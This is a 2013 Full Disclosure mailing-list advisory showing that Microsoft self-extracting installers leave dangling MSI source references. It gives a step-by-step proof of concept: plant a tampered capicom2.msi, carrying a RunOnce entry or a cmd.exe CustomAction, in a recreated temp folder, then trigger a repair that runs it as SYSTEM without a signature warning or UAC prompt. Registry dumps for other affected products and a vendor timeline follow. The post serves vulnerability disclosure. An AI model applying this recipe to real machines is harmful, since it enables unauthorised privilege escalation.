Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Defense in depth -- the Microsoft way (part 10)
From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Sat, 21 Sep 2013 23:06:13 +0200

Hi @ll,

all products, security patches and hotfixes distributed as self-
extracting packages (IExpress, "update.exe" etc.) which contain a
*.MSI or *.MSP leave dangling references to these files after their
installation.

"In certain situations ..." (see below) these dangling references
allow a privilege escalation.

Proof of concept (run on a fully patched Windows 7 SP1):

Step 0:
   a) lögin as UNPRIVILEGED user.


Step 1:
   a) download the IExpress package "CAPICOM-KB931906-v2102.exe" from
      <http://www.microsoft.com/en-us/download/details.aspx?id=3207>
      resp. <http://technet.microsoft.com/security/bulletin/ms07-028>

   b) check/verify the Authenticode (digital) signature of the
      downloaded "CAPICOM-KB931906-v2102.exe"

   c) execute the downloaded "CAPICOM-KB931906-v2102.exe" (UAC will
      ask for confirmation or prompt for administrative credentials):

      * the IExpress installer unpacks its contents into the directory
        "%TEMP%\IXP000.TMP\", calls MSIEXEC.EXE to install the unpacked
        "capicom2.msi" and removes the temporary directory afterwards;

      * MSIEXEC.EXE creates the following registry entries with dangling
        references to the (later) deleted "capicom2.msi" in the removed
        temporary directory:

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList]
"PackageName"="capicom2.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Media]
"DiskPrompt"="Security Update for CAPICOM (KB931906) Installation Disk"
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Microsoft\Windows\CurrentVersion\Uninstall\{0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}]
"InstallSource"="C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"


Step 2:
   a) extract "capicom2.msi" from "CAPICOM-KB931906-v2102.exe"
      (see <http://support.microsoft.com/kb/197147> for instructions).

   b) recreate the directory "%TEMP%\IXP000.TMP\".

   c) copy the extracted "capicom2.msi" to "%TEMP%\IXP000.TMP\".

   d) check/verify the Authenticode (digital) signature of
      "%TEMP%\IXP000.TMP\capicom2.msi".

   e) open "%TEMP%\IXP000.TMP\capicom2.msi" with the .MSI editor of
      your choice and insert (for example) the following column into
      its 'registry' table:

      REGKEY0,2,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,OUCH!,cmd.exe /k echo %CMDCMDLINE%,COM2000

      or (for example) the following column into its 'CustomAction'
      table:

      OUCH!,3122,cmd.exe,/k title %USERDOMAIN%\%USERNAME%

   f) check the Authenticode signature of the modified "capicom2.msi":
      it is INVALID now!

   g) execute "MSIEXEC.EXE /A %TEMP%\IXP000.TMP\capicom2.msi"
      and follow the dialogs.

      Especially notice that NO warning/hint about the broken/invalid
      Authenticode signature is displayed!

      OUCH!


Step 3:
   a) read <http://support.microsoft.com/kb/944298>:

   | In certain situations, Setup cannot find the .msi file in the
   | Windows Installer cache. In these situations, Setup tries to
   | resolve the source location by testing for the presence of the
   | product installation in the last-used location when Setup was
   | last run. If Setup cannot resolve the source location, the user
   | is prompted to provide the installation media.

   b) determine the name of the cached .MSI file, for example via:

      REG.EXE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData
\S-1-5-18\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\InstallProperties" /v "LocalPackage"

      (its pathname is "%SystemRoot%\Installer\<random>.msi").

   c) delete the cached .MSI file found in the substep before.

      Yes, this needs administrative rights; but read MSKB 944298
      again: "in certain situations ...".
      I just enforce such a certain situation!

   d) execute "MSIEXEC.EXE /fm {0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}".

      Again: NO warning/hint about the broken/invalid Authenticode
      signature is displayed.

      And: UAC does NOT prompt for confirmation or credentials!

      If you added a column to the 'CustomAction' table CMD.EXE runs
      and shows "NT AUTHORITY\SYSTEM" in its title bar.

   e) execute

      REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "OUCH!"

      and conclude that the modified "%TEMP%\IXP000.TMP\capicom2.msi"
      was run with administrative (really: "LocalSystem") privileges.


Timeline:
~~~~~~~~~

2008-04-09    informed vendor that MSKB 931906 creates dangling
              references and MSIEXEC.EXE /f... prompts user for
              location of capicom2.msi

2008-04-11    vendor asked: "have you tried removing the update via
              Add/Remove Programs and then re-installing?"

2008-04-11    replied to vendor: that's NOT the point here

... no more answer!

2013-05-20    next try...



stay tuned
Stefan Kanthak


PS: as examples for other self-extracting packages use
    "msxml4-KB2758694-enu.exe" and "msxml6-KB2758696-enu-x86.exe",
    available from
    <http://www.microsoft.com/en-us/download/details.aspx?id=36292> and
    <http://www.microsoft.com/en-us/download/details.aspx?id=36316> resp.
    <http://technet.microsoft.com/security/bulletin/MS13-002>,
    which create the following registry entries:

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList]
"PackageName"="msxml6.msi"
"LastUsedSource"=expand:"n;1;c:\\c3d7dd340cec94ff5838ba93\\"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Media]
"DiskPrompt"="[1]"
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Net]
"1"=expand:"c:\\c3d7dd340cec94ff5838ba93\\"


    Other products which exhibit the same problem are (not exhaustive, in
    no particular order):

1. Microsoft Security Essentials

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList]
"PackageName"="dw20shared.msi"
"LastUsedSource"=expand:"n;1;c:\\62bf30c6a367eb52738a55\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Media]
"DiskPrompt"="Microsoft Application Error Reporting"
"1"="OFFICE12;1"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Net]
"1"=expand:"c:\\62bf30c6a367eb52738a55\\x86\\"
"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList]
"PackageName"="epp.msi"
"LastUsedSource"=expand:"n;1;c:\\0d149c673ede07404629f38d05a7\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Media]
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Net]
"1"=expand:"C:\\0d149c673ede07404629f38d05a7\\x86\\"
"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"


2. .NET Framework 1.1

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList]
"PackageName"="netfx.msi"
"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Media]
"DiskPrompt"="[1]"
"1"=";Microsoft .NET Framework 1.1 [Disk 1]"
...
"21"="URTSTDD1;Microsoft .NET Framework 1.1 [Disk 1]"
...

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Net]
"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList]
"PackageName"="tmp517.tmp"
"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Media]
"DiskPrompt"="[1]"
"20872"=";Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Net]
"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

...


3. Visual C++ 2005 Redistributable 8.0.56336

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList]
"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Media]
1=";Microsoft Visual C++ 2005 Redistributable [Disk 1]"
DiskPrompt="[1]"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"


4. Visual C++ 2005 Redistributable (x64) 8.0.59192

"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"


5. Visual C++ 2005 Redistributable (x64) 8.0.61000

"PackageName"="vcredist.msi"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"


6. Virtual PC 2007 Service Pack 1

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList]
"PackageName"="Virtual_PC_2007_Install.msi"
"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Media]
"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList]
"PackageName"="KB958162.msp"
"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\Downloads\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Media]
"100"=";"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\Downloads\\"
"2"=expand:"PatchSourceList"


7. Windows Media Player Firefox Plugin

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList]
"PackageName"="ffplugin.msi"
"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Media]
"DiskPrompt"="Windows Media Player Firefox Plugin Installation"
"1"=";CD-ROM #1"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Net]
"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Defense in depth -- the Microsoft way (part 10) Stefan Kanthak (Sep 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]